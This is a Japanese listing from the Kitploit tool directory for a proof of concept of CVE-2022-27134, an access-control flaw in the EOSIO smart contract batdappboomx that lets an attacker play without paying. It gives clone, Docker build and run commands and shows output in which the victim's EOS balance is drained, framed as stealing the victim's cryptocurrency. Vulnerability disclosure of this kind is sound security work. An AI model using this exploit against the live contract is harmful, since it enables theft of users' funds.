Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
ツール/GitHubGitHub/kenun99/cve-batdappboomx
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE ID

CVE-2022-27134

製品

batdappboomxは、EOSIOブロックチェーン上で動作する公開スマートコントラクトです。このスマートコントラクトは、参加者が事前に暗号通貨を支払うと、暗号通貨を報酬として与えます。

バージョン

このスマートコントラクトの最新バージョンです。スマートコントラクトのsha256ハッシュコードは1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820です。ブロックチェーンエクスプローラhttps://bloks.io/account/batdappboomxで確認してください。

問題の種類

アクセス制御の脆弱性

説明

batdappboomxはオープンソースではありませんが、WASAIを使用して脆弱性を発見しました。攻撃者は何も支払わずにこのゲームに参加できます。

  1. 環境を起動する
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. 被害者を攻撃し、その暗号通貨(すなわちEOS)を盗む
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
ツールをダウンロード